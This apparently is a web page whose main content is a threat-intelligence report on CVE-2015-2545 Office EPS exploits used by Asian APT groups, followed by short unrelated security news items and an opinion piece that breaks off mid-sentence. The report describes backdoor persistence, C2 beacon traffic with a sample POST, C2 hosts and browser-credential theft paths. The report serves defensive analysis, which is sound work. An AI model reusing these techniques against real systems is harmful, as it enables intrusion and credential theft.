Trends and Analysis

CVE-2015-2545: overview of current threats

CVE-2015-2545 is a vulnerability discovered in 2015 and corrected with Microsoft’s update MS15-099.

The vulnerability affects Microsoft Office versions 2007 SP3, 2010 SP2, 2013 SP1 and 2013 RT SP1. The error enables an attacker to execute arbitrary code using a specially crafted EPS image file.

The exploit uses PostScript and can evade Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) protection methods. The exploit was discovered in the wild in August 2015, when it was used in a targeted attack by the Platinum group, presumably against targets in India. Over the following months, there was significant growth in the number of threat actors using the vulnerability as a primary tool for initial penetration, with both the attack groups and their targets located in South-East and Central Asia and the Far East. In this research paper, we discuss examples of attacks using the CVE-2015-2545 vulnerability undertaken by some of these groups. Overview of groups using CVE-2015-2545 Platinum (also known as TwoForOne) The group is believe to originate from South-East Asia.
Its attacks can be traced as far back as 2009.

The group is notable for exploiting 0-day vulnerabilities and carrying out a small number of highly focused targeted attacks – mostly against government agencies in Malaysia, Indonesia, China and India. This group was the first to exploit the CVE-2015-2545 vulnerability.

After the vulnerability was corrected with Microsoft updates in September and November 2015, no new Platinum attacks exploiting this vulnerability have been detected. Microsoft presented the activity of this group at the SAS conference in February 2016, and in its paper: PLATINUM: Targeted attacks in South and Southeast Asia. APT16 The group has been known for several years and is believed to be of Chinese origin.
In November and December 2015, it used a modified exploit for CVE-2015-2545 in attacks against information and news agencies in Taiwan.

These attacks were described in a FireEye research paper – The EPS Awakens – Part 2. EvilPost In December 2015, Kaspersky Lab became aware of a targeted attack against the Japanese defense sector.
In order to infect victims, the attacker sent an email with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office using an embedded EPS (Encapsulated Postscript) object.

The EPS object contained a shellcode that dropped and loaded a 32-bit or 64-bit DLL file depending on the system architecture.

This, in turn exploited another vulnerability to elevate privileges to Local System (CVE-2015-1701) and download additional malware components from the C&C server. The C&C server used in the attack was located in Japan and appears to have been compromised. However, there is no indication that it has ever been used for any other malicious purpose. Monitoring of the server activity for a period of several months did not result in any new findings. We believe the attackers either lost access to the server or realized that it resulted in too much attention from security researchers, as the attack was widely discussed by the Japanese security community. According to our research partner in Japan, the original EvilPost attack in December 2015 arrived as a spear-phishing email with a Word document attached. This document embedded an EPS object file, which triggered a vulnerability in the EPS format handler in Microsoft Word.

Even with an exploit component, Microsoft Word rendered the document correctly and displayed the decoy message.

The document is written in good Japanese, as shown below. It has been used to decoy New Year impressions of defense-related organizations. This attack was also described in the FireEye report, mentioned above. An overview of the activity of the EvilPost group activity was provided to subscribers of the Kaspersky Lab Threat Intelligence Service in March 2016.

For information about the service, please write to SPIVY In March and April 2016, a series of emails laced with an exploit forCVE-2015-2545 were detected.

The emails were sent in spear-phishing attacks, presumably targeting organizations in Hong Kong.
Identifying a specific group behind these attacks is difficult because they used a new variant of a widely available backdoor known as PoisonIvy (from which the name of the group, SPIVY, is derived).

A description of these incidents can be found in the PaloAlto blog. Danti and SVCMONDR These two groups have not yet been publicly described.

An overview of their attacks and the tools used is provided in this report. Danti attacks Danti (Kaspersky Lab’s internal name) is an APT actor that has been active at least since 2015, predominantly targeting Indian government organizations.

According to our telemetry, Danti has also been actively hitting targets in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines. The group implemented a new campaign in February and March 2016, using a repurposed implementation of the CVE-2015-2545 exploit with custom shellcode.
In order to infect the victim, the attackers distributed spear-phishing emails with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office.

The exploit is based on a malformed embedded EPS (Encapsulated Postscript) object.

This contains the shellcode that drops a backdoor, providing full access to the attackers. Main findings: Danti, a previously unknown group, is probably related to NetTraveller and DragonOK In February-March 2016 the group was observed using CVE-2015-2545 It remains active, conducting attacks against Indian diplomatic organizations Related attacks have been observed against Central and South East Asia targets The campaign leveraging the exploit for CVE-2015-2545 took place in February 2016.

As a result, several emails with attached DOCX files were uploaded to VirusTotal.

The email recipients were connected to the Indian Ministry of External Affairs, as can be seen below:, the Foreign Service Institute, Ministry of Foreign Affairs (Under Secretary (FT/NRG),, possibly related to the Chumar military post in India, a disputed area between India and China (the mail server is the same as the Indian Ministry of Foreign Affairs-, the Indian embassy in Hungary, the Indian Embassy in Denmark, the Indian embassy in Colombia All these attacks took place between the 2nd and 29th of February, 2016. Target and date Attachment name Sender Indian embassy in Hungary2nd February Mission List.doc unknown (original email was forwarded) Indian embassy in Denmark2nd February HQ List.doc ([]) Indian embassy in Colombia2nd February HQ List.doc ([]) DSFSI24th February India’s 10 Top Luxury Hotels.doc via ([]) Chumapost29th February India’s 10 Top Luxury Hotels.doc via ([]) In the case of the Indian Embassy in Hungary, it looks like the original message was forwarded from the embassy to the Indian IT security team in the Ministry of Foreign Affairs, and uploaded later to Virus Total. Initial vector The emails that were analysed had originally been sent via “3capp-mailcom-lxa06.server.lan”, perhaps using a spam-mailer program.
In all known cases, the sender used the same gate at (, a well-known open relay SMTP server. The email messages changed for different waves of the campaign. When the campaign started in February 2nd, the emails carried the subject headers “Mission List” and “HQ List”, and forged the identity of a real sender. Original message used in the first wave of attacks As can be seen above, the original email was supposedly forwarded from Anil Kumar Balani, Director of the Department of Information Technology at the Indian Ministry of Communications & Information Technology. Mission List decoy document At the same time, attackers sent a slightly different document with the subject “HQ List” to other Indian embassies (for example, those in Denmark and Colombia): Original HQ List email K.Nagaraj Naidu is Director of the Investments Technology Promotion Division in the Ministry of External Affairs, and a former Counsellor (T&C) at the Embassy of India in China. HQ List decoy document Both files (“Mission List” and “HQ list”) have different decoy content, but both use the same CVE-2015-2545 EPS exploit (image1.eps, MD5 a90a329335fa0af64d8394b28e0f86c1). Interestingly, as can be seen in their metadata, both files were modified by the user “India” on 01.02.2016, just one day before they were sent to targets. “HQ List” metadata “Mission List” metadata For the attacks at the end of February, the attackers decided to use the less relevant subject header of “10 top luxury hotels in India”, sent from an unknown sender. Top Luxury Hotels spear-phishing email This new attachment contains the same EPS exploit, but uses a different decoy document and a new payload. Top 10 Luxury Hotels decoy document The text of the document was copied from a Forbes article published in 2007.

According to its metadata, the document was created in June 2015, so it has probably been used before in unknown attacks. However, the same mail gate ( was used as for the 2nd February attacks. Email header from February 29 Email header from February 24 All the “doc” files are Web Archive Files and contain decoy documents and a malicious EPS.

The structure of the WAF files is the same in all three cases: Web archive structure Exploit The attackers used at least one known 1-day exploit: the exploitforCVE-2015-2545 – EPS parsing vulnerability in EPSIMP32.FLT module, reported by FireEye, and patched by Microsoft on 8 September 2015 with MS15-099. We are currently aware of about four different variants of the exploit. The original one was used in August 2015 against targets in India by the Platinum (TwoForOne) APT group. Original EPS exploit, used in August 2015 The second (which is a modified variant of the original exploit) was used in EvilPost attacks against Japan in 2015, and then reused by cybercriminals in March 2016.

This variant was also used by the APT16 group (ELMER backdoor) in Taiwan in December 2015.

The second variant is easily recognized by the specific strings in its EPS shellcode: The “h:\\test.txt” string could have been forgotten by the exploit developer The third variant was used in December 2015 against a Taiwanese organization, and in February 2016 against an Indian diplomatic organization.

This variant uses different shellcode but is based on the original exploit from the Platinum (TwoForOne) APT: Can be recognized by “add2 <eb135” substring In the third variant, the binaries with the encrypted malicious exe file and the decoy document can be found at the end of the files. In the third variant, the binary starts with “PdPD” (50 64 50 44), a marker previously used for encrypted binaries by a number of APT groups (Anchor Panda, Samurai Panda, Temper Panda). Encrypted data at the end of the eps file The decryption function is 1-byte XOR with a key from “\x00” to “\xff” and replacement of the Odd byte for an Even byte in several hundred bytes from the header. Decrypted exe file Decrypted decoy document We detected a few different EPS objects in the exploit and these are analyzed below.

The fourth variant of the exploit is analyzed in the “March attack” section. Read more about EPS objects and Payload in the Appendix. March attack At the end of March 2016, we discovered a new wave of attacks by the Danti group against Indian governmental institutions. On March 28th several malicious document were sent to various recipients at the Cabinet Secretariat of Government India from the email account of Ms. Richa Gaharwar (<>), Deputy Secretary at The Department of Administrative Reforms and Public Grievances, the nodal agency of the Government of India. Email sent from the account of Ms. Richa Gaharwar The message was sent from an internal IP address using Oracle Communications Messenger.

This could mean that the employee workstation used to send the malicious emails had been fully compromised. Email header The attachment contains the file “Holidays in India in 2016.docx” with the embedded EPS exploit.

This time the attackers used the second variant of the exploit (previously used by the EvilPost and APT16 groups), with minor changes: They removed the part with the “h:\\test.txt” strings Dropped the binary added at the end of the EPS object (the same as in the third variant of the exploit) Instead of using the “PdPD” string as a marker for binary, they used a new identifier: “1111111122222222” New identifier used All these changes created a new variant of the exploit, detected by very few antivirus products. The decoy document was created on January 27th, and then modified by adding the EPS exploit on March 28th, right before the attack. Decoy document According to its metadata, the document was created and modified by Chinese users: Decoy´s metadata March attack – payload The dropped file is a RarSFX archive (331307 bytes).

According to comments in the archive, this was also created by a Chinese user: The dropper installs four files in the system.

The “Appinfo.dat” file launches “PotPlayerMini.exe”, monitors the memory periodically with the GlobalMemoryStatus API function and writes the results to “C:\windows\memstatus.txt” The main loader “PotPlayerMini.exe” is a legitimate multimedia player from Daum Communication.

The file is signed with a legitimate signature from “Daum Communications Corp.” Digital signature information This legitimate file is used by the attackers to load a malicious, unsigned file from the same folder: PotPlayer.dll (the hardcoded PDB path inside is “C:\Users\john\Desktop\PotPlayer\Release\PotPlayer.pdb”).

This, in turn executes appinfo.dat (the hardcoded PDB path inside is “D:\BaiduYunDownload\ServiceExe\Release\ServiceExe.pdb”), which is a Yoda-compressed binary.

The backdoor code is stored inside update.dat. The potplayer.dll “PreprocessCmdLineEx” export function: Creates a service named “MemoryStatus” with a path to “appinfo.dat” file and sets it to HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Run with the name “potplayer”. Opens “update.dat” file, decrypts it with xor operations and passes the execution to the result buffer. “update.dat”, a backdoor: Makes its first GET request to hardcoded CnC “” in order to get the new CnC in the response. If 407 response code is returned (Proxy authentication required) then the sample sends the request again with “proxyname” string as the proxy username and “proxypass” string as the proxy password.

That suggests that may be the sample is compiled using some builder where these parameters must be set manually and in this specific sample were not changed from default. Finds “8FC628C9F43D42E2B77C2801518AF2A5” substring and decrypts it using AES CTR mode thrice using three 16-bytes keys. Makes a POST request to the new CnC with “im=validate” URL parameter and expects “success” string as the response. Forms the following structure in order to send to CnC in POST-request after AES encryption: “CFB4CDE8-9285-4CC2-ACE2-CD9CCDF22C0D” string Local IP Host name 0x3E9 dword OS version SYSTEM_INFO structure Decrypts the response using AES with one key. Commands: Passes execution to the new buffer Enumerates drives and their type Enumerates given registry key and value Enumerates processes Deletes given file Creates given process Writes to file and launches it Enumerates services Terminates given process Provides shell via cmd.exe The malware connects to the following C2s: ( ( The connection: The two hosts are dynamic DNS subdomains, using the provider CHANGEIP DNS. SVCMONDR: the Taiwan case In December 2015, we uncovered another example of the type of shellcode found in the exploit for CVE-2015-2545. On 11 December, a spear-phishing email was sent by attackers to an employee of a Taiwanese security software reseller. Spear-phishing email The attachment contained a Web Archive File with “1-3說明檔.doc” and a malicious EPS file inside. “1-3說明檔.doc” This EPS (98c57aa9c7e3f90c4eb4afeba8128484) is exploit CVE-2015-2545 and contains an encrypted binary starting with “PdPD” (50 64 50 44), the same as seen in the Danti attacks. The structure of the Web Archive also carries references to the same files as the Danti group (with image002.gif and “image002.eps”.) However, the files themselves are absent from the archive. Part of the Web Archive This resemblance could mean that we can attribute this case to the Danti group. However, it could also be a coincidence or yet another case of different groups using the same malicious code.

That’s why we are noting this incident separately from the Danti group’s activity. Interestingly, in the first few days of December, another group – APT16 (FireEye’s classification) also targeted Taiwan-based organizations with a CVE-2015-2545 EPS exploit, and its emails originated from the same domain as the one sent by the SVCMONDR attackers. However, it used another type of shellcode and a different backdoor – ELMER. After opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program “svcmondr.exe” (8052234dcd41a7d619acb0ec9636be0b). This queries the registry: “HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings” and “HKCU\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Connections\DefaultConnectionSettings” and compares the values.
If they don’t coincide, it sets the “DefaultConnectionSettings” value from the HKEY_USERS to HKCU key. It sets values taken from: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ {A8A88C49-5EB2-4990-A1A2-0876022C854F} HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ {AEBA21FA-782A-4A90-978D-B72164C80120} HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10 To the appropriate HKCU key (for example: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ {A8A88C49-5EB2-4990-A1A2-0876022C854F}, etc.). Then forms the structure in order to send it to the CnC in a POST-request with the following fields: 0x8888 constant 0x8000 constant 18-bytes hex string based on CoCreateGuid function Local IP MAC address Example of POST request It encodes the resulting structure with base64.

Example of a POST request: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: 112Connection: Keep-AliveCache-Control: no-cache AAAAAIiIAAAAgAAAAAAAAGQwNTRlYTkxMDAwMGEyZmU3NAAAAAAAAAAAAAAAAAAAMTAuNjMuMTIuNAAAAAAAADAwMEMyOUU5Nzg2QgAAAAAAAAAA Based on the CnC response, the sample: Checks the password in the CnC response and compares it with the hardcoded password “1010” in its configuration structure.
If the password is valid, it sets a “certified” flag and can further process the following commands. Launches given command line with ShellExecute, writes output results to %tmp% file, sends results to CnC and deletes the file. Downloads file to %Temp% folder. Uploads given file to CnC. Sets sleep interval. All results sent to the CnC after processing commands are encrypted with RC4 with a MAC-address as a key. The CnC points to an IP address in Hong Kong.

This IP address belongs to a local private company, but falls within a range of IP addresses that belong to another enterprise that has already been identified as a host location for command and control servers that communicate with malware. The CnC has been used in other APT incidents, attributed by FireEye to the group “admin@338” aka “Temper Panda” (, In general, this IP address space from “New World Telecom HK” is one of the favorite places used by different Chinese-origin APT groups to host command & control servers/proxies. Another detail suggesting a possible relationship between SVCMONDR and Temper Panda is the use of the “PdPD” (50 64 50 44) marker for encrypted binaries.

According to Crowdstrike, the same marker has been used previously by a number of APT groups (Anchor Panda, Samurai Panda and Temper Panda). The latest known activity of “admin@338” was in August 2015, when it was used to target Hong Kong-based media using its own tools, LOWBALL and BUBBLEWRAP. However, we are unable to draw any conclusion regarding the relationship between the SVCMONDR group and Temper Panda. According to KSN data, in addition to Taiwan, there are some SVCMONDR victims in Thailand. Conclusions We are currently aware of at least four different APT actors actively using exploits of the CVE-2015-2545 vulnerability: TwoForOne (also known as Platinum), EvilPost, APT16 and Danti. These groups have their own toolsets of malicious program.

Danti’s arsenal is more extensive than those of EvilPost and APT16, and in terms of functionality can be compared with Platinum.

All groups are focused on targets in the Asian region and have never been seen in incidents in Western Europe or the USA. The TwoForOne (Platinum) group is described in Microsoft research, APT16 in FireEye reports, and EvilPost and Danti in Kaspersky Lab private reports. Danti is highly focused on diplomatic entities.
It may already have full access to internal networks in Indian government structures.

According to Kaspersky Security Network, some Danti Trojans have also been detected in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines. Despite the fact that Danti uses a 1-day exploit, the group is able to make its own modifications to bypass current antivirus detections.

A number of the modules used by Danti have the same functionality as previously known and used malicious programs like NetTraveller and DragonOK. The use of CVE-2015-2545 exploits is on the rise.
In addition to the groups mentioned above, we have seen numerous examples of these exploits being used by traditional cybercriminals in mass mailings in February-April 2016.
Such attacks mostly target financial institutions in Asia.
Specifically, attacks have been recorded in Vietnam, the Philippines and Malaysia.

There are reasons to believe that Nigerian cybercriminals are behind these attacks.
In some cases, the infrastructure used is the same as the one we saw when analyzing the Adwind Trojan. We expect to see more incidents with this exploit and we continue to monitor new waves of attacks and the potential relationship with other attacks in the region. To know more about how to address the issue of known vulnerabilities most properly, read this post in the Kaspersky Business Blog. Additional references: The EPS AwakensPart 1Part 2 Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets New Poison Ivy Rat Variant targets Hong-Kong-Pro-Democracy Activists Microsoft research “Platinum” EvilPost attacks (Kaspersky Lab Private Report, March 2016) Appendix A: EPS Objects their payload and http.exe trojan analysis EPS Objects File MD5: a90a329335fa0af64d8394b28e0f86c1File type: Encapsulated Postscript FileSize: 189’238 bytesFile Name: image001.eps (from HQ list) This EPS file contains a shellcode that decrypts and saves file “lsass.exe” and decoy document to disk. The dropped malicious files are described below. File MD5: 07f4b663cc3bcb5899edba9eaf9cf4b5File type: Encapsulated Postscript FileSize: 211’766 bytesFile Name: image001.eps (from Mission list) This EPS file contains a shellcode that decrypts and saves file “lsass.exe” and decoy document to disk. The dropped malicious files are described below. File MD5: b751323586c5e36d1d644ab42888a100File type: Encapsulated Postscript FileSize: 398’648 bytesFile Name: image001.eps (from India’s 10 Top Luxury Hotels) This EPS file contains a shellcode that decrypts and saves the dropper file (Windows CAB) and decoy document to disk. The dropper and dropped malicious file “http.exe” are described below. Payload analysis Backdoor File Name lsass.exe MD5 8ad9cb6b948bcf7f9211887e0cf6f02a File type PE32 executable for MS Windows (GUI) Intel 80386 32-bit Compilation timestamp 2015-12-28 07:47:54 PE Resources BIN (CHINESE SIMPLIFIED) Size 138’240 bytes URL: http://goback.strangled[.]net:443/ [random string]TYPE: POSTUSER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Real IP: Drops file from its resource section to %ALLUSERSPROFILE%\ IEHelper\mshtml.dll.

The backdoor then writes a string to a given offset with the value dependent on the %ALLUSERSPROFILE% environment variable. Thus, the md5 of dropped files can vary.

Examples of md5 with standard variables: be0cc8411c066eac246097045b73c282bae673964e9bc2a45ebcc667895104ef Sets registry: If user is not admin “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersio\Run” value {53372C34-A872-FACF-70A7-A23C81C766C4} = “C:\Windows\System32\rundll32.exe %ALLUSERSPROFILE%\ \IEHelper\mshtml.dll, IEHelper” In any case: HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{53372C34-A872-FACF-70A7-A23C81C766C4}” value “StubPath” = “C:\Windows\System32\rundll32.exe %ALLUSERSPROFILE%\ \IEHelper\mshtml.dll, IEHelper” Sets the following values before creating the instance of IE for communicating with the CnC: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ DisableFirstRunCustomize=1HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ Check_Associations=”no”HKEY_CURRENT_USER\Software\Microsoft\Internet Connection Wizard\ Completed=1HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ IEHarden=0 Collects the following info, encodes with base64 and sends to the CnC: Memory status OS version User name OEM code page identifier Local IP CPU speed Forms the following body in POST request to the CnC: —-=_Part_%xContent-Disposition: form-data; name=”m1.jpg”Content-Type: application/octet-steam%base64%—-=_Part_%x Where %x – decrypted adapter’s MAC address based on xor operation. The URL path in the POST request is generated randomly with uppercase letters. Example of CnC communication: Based on the CnC response, the sample: Provides shell via cmd.exe Creates directory Lists files in directory Deletes file Uploads given file to CnC Enumerates drives, gets their type and available space Launches given file Moves file Writes and appends to given file Uninstalls itself File Name mshtml.dll MD5 be0cc8411c066eac246097045b73c282or bae673964e9bc2a45ebcc667895104efor different File type PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit Compilation timestamp 2015-12-28 07:45:20 Size 72’192 bytes mshtml.dll repeats entirely the functionality of its dropper (CnC communication and commands processing) in its “IEhelper” export and is built on the same source code. http.exe trojan MD5 6bbdbf6d3b24b8bfa296b9c76b95bb2f | Sun, 13 Apr 2008 18:32:45 GMT Drops file to %Temp%\IXP000.TMP\http.exe and launches it. Filename http.exe MD5 3fbe576d33595734a92a665e72e5a04f | Wed, 13 Jan 2016 10:25:10 GM CnC Sets registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run“IME_hp” = %ALLUSERPROFILE%\Accessories\wordpade.exe HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run“IME_hp” = %ALLUSERPROFILE%\Accessories\wordpade.exe HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run“IME_hp” = %ALLUSERPROFILE%\Accessories\wordpade.exe Copies itself to %ALLUSERPROFILE%\Accessories\wordpade.exe, launches it and exits self-process. wordpade.exe file proceeds: Creates mutex “Global\wordIE”.
Stores keystrokes and windows titles to %Temp%\dumps.dat and xors it with 0x99. Knocks to CnC via IE instance: Includes the following field in HTTP-header: Cookie: ID=1%x, where %x – Volume Serial number of disk C Based on the CnC response, the sample: Provides shell via cmd.exe Lists files in all drives and writes to given file Retrieves OS version, Local IP, installed browser, Computer name, User name and writes to given file Writes to given file Deletes given file Uploads given file to CnC Makes screenshots and writes to file %Temp%\makescr.dat Retrieves proxy settings and proxy authentication credentials from Mozilla (signons.sqlite, logins.json) and Chrome files (%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data), Microsoft WinInet storage, Microsoft Outlook Appendix B: Danti sample hashes Emails:aae962611da956a26a76d185455f1d44 ( ( ( (India, (India, (India, Cabinet Secretary) Doc (Web Archive File):C591263d56b57dfadd06a68dd9657343 (HQ List)Aebf03ceaef042a833ee5459016f5bde (Mission List)Fd6636af7d2358c40fe6923b23a690e8 (India’s 10 Top Luxury Hotels) Docx:D91f101427a39d9f40c41aa041197a9c (Holidays in India in 2016) EPS:07f4b663cc3bcb5899edba9eaf9cf4b5 (India, from Mission list)a90a329335fa0af64d8394b28e0f86c1 (India, HQ List)B751323586c5e36d1d644ab42888a100 (India, Hotels)8cd2eb90fabd03ac97279d398b09a5e9 (Holidays in India in 2016) CAB dropper:6bbdbf6d3b24b8bfa296b9c76b95bb2f RarSFX:d0407e1a66ee2082a0d170814bd4ab024902abe46039d36b45ac8a39c745445a Potplayer:f16903b2ff82689404f7d0820f461e5d (clean tool) Trojans:6bbdbf6d3b24b8bfa296b9c76b95bb2f (dropper, from cab-archive)3fbe576d33595734a92a665e72e5a04f (http.exe)8ad9cb6b948bcf7f9211887e0cf6f02a (lsass.exe)9469dd12136b6514d82c3b01d6082f59be0cc8411c066eac246097045b73c282 (mshtml.dll)bae673964e9bc2a45ebcc667895104efd44e971b202d573f8c797845c90e4658 (update.dat)332397ec261393aaa58522c4357c3e48 (potplayer.dll)2460871a040628c379e04f79af37060d (appinfo.dat) C274.208.4.20074.208.4.201180.150.227.135Goback.strangled[.][.]org (,[.]com ([.]com ( Appendix C: sample hashes of SVCMONDR attacks Emails:7a60da8198c4066cc52d79eecffcb327 (Taiwan, Doc (Web Archive File):d0533874d7255b881187e842e747c268 (Taiwan, 1-3說明檔.doc) EPS:98c57aa9c7e3f90c4eb4afeba8128484 (Taiwan) Trojans:8052234dcd41a7d619acb0ec9636be0b (svcmondr.ex, Taiwan)046b98a742cecc11fb18d9554483be2d (svcmondr.ex,Thailand) C2:[.]comwww.onmypc.serverpit[.]com

2.5k Twitter Accounts Hacked To Spread Links To Adult Content

May 24, 2016Share this content: Hackers compromised 2,500 Twitter accounts to earn money through affiliate programs. Cyber crooks hijacked more than 2,500 Twitter accounts and used them to post links to adult content in an attempt to cash in on affiliate programs that pay for sign-ups. Symantec researchers spotted compromises of the accounts of an electrofunk band, an international journalist from The Telegraph, and other high profile individuals during the campaign, according to a May 23 blog post. The attackers often replaced the user's profile picture with that of a scantily clad woman, altered the bio to include links to adult sites, liked tweets, and followed users with the intent of luring those curious enough to investigate the recently altered profiles, the post said. “If a user visits the compromised profile, they will see tweets that claim to offer free sign-ups to watch ‘hot shows' over webcam, or dates and sexual encounters,” researchers wrote. The new tweets on the compromised page will contain sexually suggestive photos and shortened links, using either Bitly or Google's URL shorteners, and redirect users to the adult sites, according to the post.

The links also include an affiliate tag which identifies where traffic originates from. “The incentive for the attackers is to drive users to these adult dating websites with the intention of getting users to sign-up for these sites,” Symantec Senior Security Response Manager Satnam Narang told via emailed comments. “We estimate that each successful conversion is worth $4.00 per user.” Researchers noted that several of the compromised accounts were older accounts that were orphaned by their owners and had not sent new tweets in years.

The oldest account was registered in December 2007, 27 percent of compromised accounts were created in 2011, and 73 percent were at least four years or older, researchers wrote. “We suspect that the accounts were compromised as a result of weak passwords and password re-use, where by passwords obtained from other breaches allowed attackers to gain access to these accounts,” Narang said. Giovanni Vigna, CTO and co-founder of cybersecurity firm Lastline, told SCMagazine he agreed. “They might have obtained username/password information from a breached music-exchange service and then simply tried the password combination against Twitter,” he said via emailed comments. Vigna said that a large portion of the compromised accounts being old and barely active further supported the claim.  InfoArmor Chief Intelligence Officer Andrew Komarov contended the credentials came from organized attacks on WEB-applications. “In many cases, they use such data for checking the affected users credentials across multiple online-services, including social network, in order to monetize it in more scalable way – just one pair of credentials may lead to 10-plus accounts on various services, including Twitter, e-commerce, instant messengers and profiles on various communities,” Komarov told via email. To avoid account compromise, researchers recommended users create a strong and unique password, use a password manager, and consider enabling Twitter's login verification.

GSA May Offer Bug Bounty Program For Federal Agencies

Researchers will be eligible for bounties of up to $3,500 for discovering bugs in federal agency systems. Apparently taking a cue from the over 450 organizations that already have a bug bounty program in place, the US General Services Administration’s 18F digital services group appears to be exploring the idea of hosting one for federal agencies. Details of the program were first reported by FedScoop and have not yet been publicly released.

But the 18F group’s page on GitHub offers a glimpse of what the GSA appears to have in mind for the program. The page shows that bug hunters who report high-severity vulnerabilities to agencies participating in the GSA bug bounty service could be eligible for a reward of up to $3,500, depending on the quality of the report.
Vulnerabilities that the GSA considers as high severity include SQL injection flaws, remote code execution errors, site-wide elevation of privilege or authentication bypass issues, and flaws that lead to widespread information disclosure. People who report medium severity flaws such as cross-site scripting errors (XSS) and cross-site request forgery (CSRF) vulnerabilities stand to make up to $1,000 per bug. Low severity flaws, such as server misconfiguration and provisioning errors, data leaks involving non-personally identifiable data, and open redirects will fetch $500. “We'll typically follow these guidelines closely, but we do reserve the right to adjust our rewards based on our assessment of severity and the quality of the report,” the description on the GSA 18F GitHub page noted. “For example, we may pay less for low-quality reports, or more for low-severity issues that are especially novel or required significant effort.” The page also has a long list of vulnerabilities that researchers are welcome to report to participating agencies but will not qualify for a bounty.

Among them are bugs that require attackers to gain physical access to a system, denial of service attacks, insecure cookie settings, and brute-force attacks that require a lot of time and resources to exploit. Bounties will be available only for vulnerabilities discovered in a specific list of federal agency sites that are in scope for the program.
Submissions covering out-of-scope websites will not be rewarded. No details are available yet on the agency sites that are in scope for the program and those that are out of scope because the program hasn’t officially launched yet. Dozens of technology vendors, and increasingly many non-tech companies such as United Airlines, Uber, Starbucks, and the Electronic Frontier Foundation, have similar bug bounty programs in place. If it launches the program, the GSA will become the second US federal government entity to have a bug bounty initiative.

Earlier this year, the Pentagon became the first when it launched a Hack The Pentagon commercial bug bounty program and did a one-month pilot run with it between April and May. The big question is what sort of warranties the program will offer against prosecution for those who do try and find bugs in agency systems, says Richard Stiennon, chief security analyst at IT-Harvest. “Will the GSA also protect those looking for bugs against prosecution for violating the Computer Fraud and Abuse Act?” he says. “Hacking systems is illegal, even when the intent is to expose vulnerabilities. Without clear protections, researchers are unlikely to participate in the program, he says. "[But] if they will provide a get-out-of-jail free card even I would help them find vulnerabilities in government agencies' applications,” Stiennon says. Pete Lindstrom, an analyst at IDC, predicts that the program will attract a lot of curious hackers and possibly a lot of noise. “Presumably, the program will be less expensive than hiring experienced vulnerability researchers and QA folks internally,” he says. Related stories: Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ...
View Full Bio More Insights

Poor Airport Security Practices Just Don't Fly

Five lessons learned the hard way by the Tampa International Airport about bringing third parties into a security environment. I love living in the Tampa area for a lot of reasons, among them getting to regularly use one of the best airports in the US – Tampa International Airport (TIA). Unfortunately for the folks who run TIA, they had a spot of trouble that was reported earlier this month by the Tampa Tribune and others. Like a lot of places these days, TIA experienced an IT security breach. Unlike a lot of places—because it's an international airport—TIA has to do a lot of explaining.  Here is what we know from what has been reported -- and it reads like an information security “Don’t Do List.” TIA hired an individual (and apparently his wife) to work on an Oracle project. That person shared their VPN logins and (privileged) accounts and passwords with almost a dozen other people and some others working for a staffing firm, “who logged into the system dozens of times from places like Mumbai and Pradesh, India, United Arab Emirates and Kashmir, India.” This episode brings into clear view the unfortunate collision of insecure VPNs, open vendor access, and lack of best practices in password management. That collision has led to multiple people losing their jobs, including the IT Director, an IT manager, and others. It's also led to TIA being forced to cripple their business processes by taking the drastic, but at this point probably necessary, step of only allowing the airport's computer network to be accessed from equipment issued by the aviation authority, not from personal electronic devices. So as a result of the breach, because TIA didn’t setup access correctly to start, they now have to go back to how we did things 20 years ago. There is a better way. Here are five lessons that any company bringing third parties into their security environment should take into account. 1. Never trust your vendors when it comes to YOUR information security. Properly vet the third parties, contractors, and consultants who are working for you. “Body shops” in IT services are not known for their cutting edge information security. They may have some consultants for hire, but it doesn’t equate to them having a mature security posture of their own. Be sure to understand how they screen the temps they’re giving you and see if they include security awareness training as part of how they handle their stable of workers. 2. When you must allow third-party access into your environment, you don’t have to use a legacy solution such as a VPN and hope that everyone behaves in how they use it. A solution using a brokered connection that allows you to control the Who, What, Where, When, and How of their connection to you gives you real control. As the The Offspring song goes, “You gotta keep ‘em separated!”  And you can -- and still have third parties working on your projects, without giving them an IP-enabled grappling hook into your internal network.  3. Don’t give blanket access. Your vendors should be part of a mature workflow process that tracks everything from their need for access to granting it to revoking it. This gives you attribution and accountability. 4. Monitor the access you are granting them. Have the ability to “peek over their shoulder” whenever you want. Record all the activity. A pretty disturbing note in the TIA hack is the fact that even after security auditors investigated the breach, they were “unable to determine specifically what data may have been transferred.” Recording what is going on when 